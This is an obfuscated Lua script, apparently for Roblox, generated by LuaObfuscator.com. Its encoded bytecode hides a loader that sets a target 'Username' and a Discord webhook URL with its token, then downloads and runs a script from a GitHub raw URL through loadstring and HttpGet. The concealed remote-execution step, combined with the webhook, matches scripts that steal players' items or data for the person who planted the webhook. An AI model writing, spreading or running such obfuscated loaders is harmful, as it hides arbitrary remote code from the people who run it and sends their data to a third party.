--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then v19=v0(v3(v30,1,1));return "";else local v82=0;local v83;while true do if (v82==0) then v83=v2(v0(v30,16));if v19 then local v104=v5(v83,v19);v19=nil;return v104;else return v83;end break;end end end end);local function v20(v31,v32,v33) if v33 then local v84=(v31/((5 -3)^(v32-(1 + 0))))%((5 -3)^(((v33-(878 -((1347 -(68 + 997)) + 595))) -(v32-((1271 -(226 + 1044)) -0))) + (1638 -(1523 + 114)))) ;return v84-(v84%(2 -1)) ;else local v85=(2 + 0)^(v32-(620 -(555 + 64))) ;return (((v31%(v85 + v85))>=v85) and (932 -(857 + 74))) or (568 -(367 + 201)) ;end end local function v21() local v34=0 -0 ;local v35;while true do if (v34==(117 -(32 + 85))) then v35=v1(v16,v18,v18);v18=v18 + 1 + 0 ;v34=1 + 0 ;end if (v34==(958 -(892 + 65))) then return v35;end end end local function v22() local v36=0 -0 ;local v37;local v38;while true do if (v36==(0 -0)) then v37,v38=v1(v16,v18,v18 + (3 -1) );v18=v18 + (352 -(64 + 23 + (1045 -782))) ;v36=181 -(67 + 113) ;end if (v36==(1 + 0)) then return (v38 * (628 -(1324 -(802 + 150)))) + v37 ;end end end local function v23() local v39=0;local v40;local v41;local v42;local v43;while true do if ((0 -0)==v39) then v40,v41,v42,v43=v1(v16,v18,v18 + (7 -4) );v18=v18 + (6 -2) ;v39=1 + 0 ;end if (v39==(998 -(915 + 82))) then return (v43 * 16777216) + (v42 * (185570 -120034)) + (v41 * (150 + 106)) + v40 ;end end end local function v24() local v44=v23();local v45=v23();local v46=1;local v47=(v20(v45,1188 -((1841 -(201 + 571)) + 118) ,20) * (2^(72 -40))) + v44 ;local v48=v20(v45,21,(1205 -(116 + 1022)) -36 );local v49=((v20(v45,6 + 26 )==(1 -0)) and  -(1 + (0 -0))) or ((465 + 327) -(368 + 423)) ;if (v48==(0 -(0 -0))) then if (v47==(18 -(10 + 8))) then return v49 * ((0 -0) -0) ;else local v92=0;while true do if (v92==(442 -(416 + 26))) then v48=1;v46=0 -0 ;break;end end end elseif (v48==(879 + 1168)) then return ((v47==(0 -(859 -(814 + 45)))) and (v49 * ((439 -(145 + 293))/((1059 -629) -(44 + 386))))) or (v49 * NaN) ;end return v8(v49,v48-(2509 -(998 + 488)) ) * (v46 + (v47/((1 + 0 + 1)^(43 + 9)))) ;end local function v25(v50) local v51=0;local v52;local v53;while true do if (v51==(1 + (0 -0))) then v52=v3(v16,v18,(v18 + v50) -(886 -((2008 -(760 + 987)) + 624)) );v18=v18 + v50 ;v51=2;end if (v51==(3 -1)) then v53={};for v93=1081 -(1020 + 60) , #v52 do v53[v93]=v2(v1(v3(v52,v93,v93)));end v51=(3339 -(1789 + 124)) -(630 + 793) ;end if ((0 -0)==v51) then v52=nil;if  not v50 then v50=v23();if (v50==0) then return "";end end v51=4 -3 ;end if (v51==(2 + 1)) then return v6(v53);end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v54=(function() return 1941 -(550 + 1391) ;end)();local v55=(function() return;end)();local v56=(function() return;end)();local v57=(function() return;end)();local v58=(function() return;end)();local v59=(function() return;end)();local v60=(function() return;end)();local v61=(function() return;end)();while true do if (v54~=3) then else for v95= #" ",v23() do local v96=(function() return 0;end)();local v97=(function() return;end)();while true do if (0~=v96) then else v97=(function() return v21();end)();if (v20(v97, #"]", #"}")~=0) then else local v115=(function() return 0 -0 ;end)();local v116=(function() return;end)();local v117=(function() return;end)();local v118=(function() return;end)();while true do if (v115~=2) then else if (v20(v117, #",", #":")== #"}") then v118[2 -0 ]=(function() return v61[v118[1786 -(599 + 1185) ]];end)();end if (v20(v117,1 + 1 ,2 + 0 )~= #">") then else v118[ #"asd"]=(function() return v61[v118[ #"xxx"]];end)();end v115=(function() return 577 -(507 + 67) ;end)();end if (v115==0) then local v147=(function() return 1749 -(1013 + 736) ;end)();while true do if (v147~=1) then else v115=(function() return 1 + 0 ;end)();break;end if (v147==0) then v116=(function() return v20(v97,2, #"nil");end)();v117=(function() return v20(v97, #"asd1",14 -8 );end)();v147=(function() return 3 -2 ;end)();end end end if (v115~=(868 -(550 + 317))) then else local v148=(function() return 0;end)();while true do if (v148==1) then v115=(function() return 2 -0 ;end)();break;end if (v148~=0) then else v118=(function() return {v22(),v22(),nil,nil};end)();if (v116==0) then local v183=(function() return 0;end)();local v184=(function() return;end)();while true do if (v183~=(0 -0)) then else v184=(function() return 0;end)();while true do if (0==v184) then v118[ #"gha"]=(function() return v22();end)();v118[ #"http"]=(function() return v22();end)();break;end end break;end end elseif (v116== #"<") then v118[ #"nil"]=(function() return v23();end)();elseif (v116==(5 -3)) then v118[ #"19("]=(function() return v23() -((287 -(134 + 151))^(1681 -(970 + 695))) ;end)();elseif (v116== #"91(") then local v190=(function() return 0 -0 ;end)();while true do if (v190==0) then v118[ #"19("]=(function() return v23() -((1992 -(582 + 1408))^16) ;end)();v118[ #"0836"]=(function() return v22();end)();break;end end end v148=(function() return 3 -2 ;end)();end end end if (v115==(3 -0)) then if (v20(v117, #"nil", #"91(")~= #"~") then else v118[ #"0836"]=(function() return v61[v118[ #".dev"]];end)();end v56[v95]=(function() return v118;end)();break;end end end break;end end end for v98= #"~",v23() do v57,v98,v28=(function() return v55(v57,v98,v28);end)();end return v59;end if (v54~=(3 -2)) then else local v89=(function() return 1824 -(1195 + 629) ;end)();while true do if (v89==1) then v60=(function() return v23();end)();v54=(function() return 2 -0 ;end)();break;end if (v89~=(241 -(187 + 54))) then else v58=(function() return {};end)();v59=(function() return {v56,v57,nil,v58};end)();v89=(function() return 1;end)();end end end if (v54~=(782 -(162 + 618))) then else local v90=(function() return 0;end)();while true do if (v90~=(0 + 0)) then else v61=(function() return {};end)();for v105= #"\\",v60 do local v106=(function() return 0 + 0 ;end)();local v107=(function() return;end)();local v108=(function() return;end)();local v109=(function() return;end)();while true do if ((0 -0)~=v106) then else local v119=(function() return 0;end)();while true do if (v119==(0 -0)) then v107=(function() return 0;end)();v108=(function() return nil;end)();v119=(function() return 1;end)();end if (v119~=(1 + 0)) then else v106=(function() return 1637 -(1373 + 263) ;end)();break;end end end if (v106==1) then v109=(function() return nil;end)();while true do if (v107~=(1000 -(451 + 549))) then else local v161=(function() return 0 + 0 ;end)();while true do if (v161==(0 -0)) then v108=(function() return v21();end)();v109=(function() return nil;end)();v161=(function() return 1 -0 ;end)();end if (v161==1) then v107=(function() return 1;end)();break;end end end if ((1385 -(746 + 638))==v107) then if (v108== #"|") then v109=(function() return v21()~=0 ;end)();elseif (v108==2) then v109=(function() return v24();end)();elseif (v108== #"91(") then v109=(function() return v25();end)();end v61[v105]=(function() return v109;end)();break;end end break;end end end v90=(function() return 1 + 0 ;end)();end if (v90~=(1 -0)) then else v59[ #"xnx"]=(function() return v21();end)();v54=(function() return 344 -(218 + 123) ;end)();break;end end end if (v54~=(1581 -(1535 + 46))) then else local v91=(function() return 0 + 0 ;end)();while true do if (v91~=1) then else v57=(function() return {};end)();v54=(function() return 1 + 0 ;end)();break;end if (v91~=0) then else v55=(function() return function(v110,v111,v112) local v113=(function() return 560 -(306 + 254) ;end)();local v114=(function() return;end)();while true do if (v113==0) then v114=(function() return 0;end)();while true do if (v114==0) then local v171=(function() return 0;end)();while true do if (v171~=0) then else v110[v111-#":" ]=(function() return v112();end)();return v110,v111,v112;end end end end break;end end end;end)();v56=(function() return {};end)();v91=(function() return 1 + 0 ;end)();end end end end end local function v29(v62,v63,v64) local v65=v62[1 -0 ];local v66=v62[2];local v67=v62[11 -8 ];return function(...) local v68=v65;local v69=v66;local v70=v67;local v71=v27;local v72=1468 -(899 + 437 + 131) ;local v73= -(1 + 0);local v74={};local v75={...};local v76=v12("#",...) -(2 -1) ;local v77={};local v78={};for v86=603 -(268 + 335) ,v76 do if ((123<=2579) and (v86>=v70)) then v74[v86-v70 ]=v75[v86 + (127 -((1241 -(936 + 189)) + 10)) ];else v78[v86]=v75[v86 + 1 + 0 ];end end local v79=(v76-v70) + (291 -(60 + 230)) ;local v80;local v81;while true do v80=v68[v72];v81=v80[1 -0 ];if (v81<=(581 -(426 + 146))) then if ((v81<=4) or (846>=2368)) then if ((v81<=(1 + 0)) or (4012<=3358)) then if (v81>(1456 -(282 + 1174))) then v78[v80[813 -(569 + 242) ]]=v64[v80[8 -5 ]];else local v122=0 + 0 ;local v123;local v124;local v125;local v126;while true do if (v122==(1024 -(706 + 318))) then v123=v80[2];v124,v125=v71(v78[v123](v13(v78,v123 + (1252 -(721 + 175 + 355)) ,v80[1274 -(945 + 326) ])));v122=2 -1 ;end if (v122==(1 + 0)) then v73=(v125 + v123) -(701 -(271 + 429)) ;v126=0 -0 ;v122=2;end if (v122==(2 + 0)) then for v172=v123,v73 do v126=v126 + (1501 -(1408 + 92)) ;v78[v172]=v124[v126];end break;end end end elseif (v81<=(1088 -(461 + 625))) then if (v78[v80[1290 -(993 + 295) ]]==v80[1 + 3 ]) then v72=v72 + 1 ;else v72=v80[3 + (1613 -(1565 + 48)) ];end elseif (v81>(1174 -(418 + 466 + 287))) then v78[v80[1 + 1 ]]=v80[1 + 2 ];else v64[v80[(1139 -(782 + 356)) + 2 ]]=v78[v80[1 + 1 ]];end elseif (v81<=(535 -(406 + 123))) then if (v81>((2041 -(176 + 91)) -(1749 + (52 -32)))) then local v127=0 + 0 ;local v128;while true do if (v127==(0 -0)) then v128=v80[1 + (1 -0) ];v78[v128]=v78[v128](v13(v78,v128 + (1323 -((2341 -(975 + 117)) + 73)) ,v73));break;end end else local v129=0 + 0 ;local v130;while true do if (v129==(0 + 0)) then v130=v80[1331 -(797 + 532) ];v78[v130]=v78[v130](v13(v78,v130 + (1146 -(466 + 679)) ,v73));break;end end end elseif ((1494<=3005) and (v81<=7)) then v72=v80[2 + 1 ];elseif (v81==((1894 -(157 + 1718)) -11)) then do return;end elseif ((v78[v80[5 -3 ]]==v80[1206 -(373 + 829) ]) or (3111==2134)) then v72=v72 + (1901 -(106 + 1794)) ;else v72=v80[1133 -(369 + 618 + 143) ];end elseif ((2355==2355) and (v81<=(5 + 9))) then if (v81<=(3 + (28 -20))) then if (v81==(18 -(27 -19))) then v64[v80[(1026 -(697 + 321)) -5 ]]=v78[v80[1 + (2 -1) ]];else v78[v80[5 -(5 -2) ]]();end elseif (v81<=((290 -164) -(2 + 2 + 110))) then v78[v80[586 -(57 + 527) ]]();elseif ((v81==13) or (588<=432)) then do return;end else v78[v80[1429 -(41 + 1386) ]]=v64[v80[106 -(17 + 86) ]];end elseif (v81<=(11 + 5)) then if ((4797>=3895) and (v81==(13 + 2))) then v78[v80[3 -(1 -0) ]]=v80[8 -5 ];else local v136=v80[168 -(122 + 44) ];local v137=v78[v80[1583 -(1183 + 397) ]];v78[v136 + (2 -1) ]=v137;v78[v136]=v137[v80[3 + (2 -1) ]];end elseif (v81<=(28 -11)) then local v141=v80[1977 -(1913 + 62) ];local v142,v143=v71(v78[v141](v13(v78,v141 + (3 -2) ,v80[3 + 0 ])));v73=(v143 + v141) -(1 + 0) ;local v144=0 -0 ;for v145=v141,v73 do local v146=(2888 -(322 + 905)) -(1477 + 184) ;while true do if (v146==(65 -(30 + 35))) then v144=v144 + 1 ;v78[v145]=v142[v144];break;end end end elseif ((3577==3577) and (v81>(13 + 5))) then local v157=1257 -(1043 + 214) ;local v158;local v159;while true do if ((3794>3693) and (v157==(3 -2))) then v78[v158 + (1213 -(323 + 889)) ]=v159;v78[v158]=v159[v80[10 -6 ]];break;end if (v157==0) then v158=v80[(1193 -(602 + 9)) -(361 + 219) ];v159=v78[v80[323 -((1242 -(449 + 740)) + 267) ]];v157=1 + 0 ;end end else v72=v80[416 -(15 + 398) ];end v72=v72 + (983 -(18 + 964)) ;end end;end return v29(v28(),{},v17)(...);end return v15("LOL!0A3Q00028Q00026Q00F03F030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403493Q00682Q7470733A2Q2F7261772E67697468756275736572636F6E74656E742E636F6D2F496D4469676974616C7A2F4D6F7269536372697074732F6D61696E2F4D6F72695363726970747303083Q00557365726E616D6503083Q0059726F746E6D653203073Q00576562682Q6F6B03793Q00682Q7470733A2Q2F646973636F72642E636F6D2F6170692F776562682Q6F6B732F313236333437333836333439373438363437362F52635432536E50433450475A6A4436304151766C72777046496E4230535751367551505669515753345A6E7A454D45646B634B4668434E6A7A59384B6259774E596D303300143Q00120F3Q00013Q0026093Q000B000100020004073Q000B0001001201000100033Q001201000200043Q00201300020002000500120F000400064Q0011000200044Q000600013Q00022Q000B0001000100010004073Q001300010026093Q0001000100010004073Q0001000100120F000100083Q00120A000100073Q00120F0001000A3Q00120A000100093Q00120F3Q00023Q0004073Q000100012Q00083Q00017Q00",v9(),...);
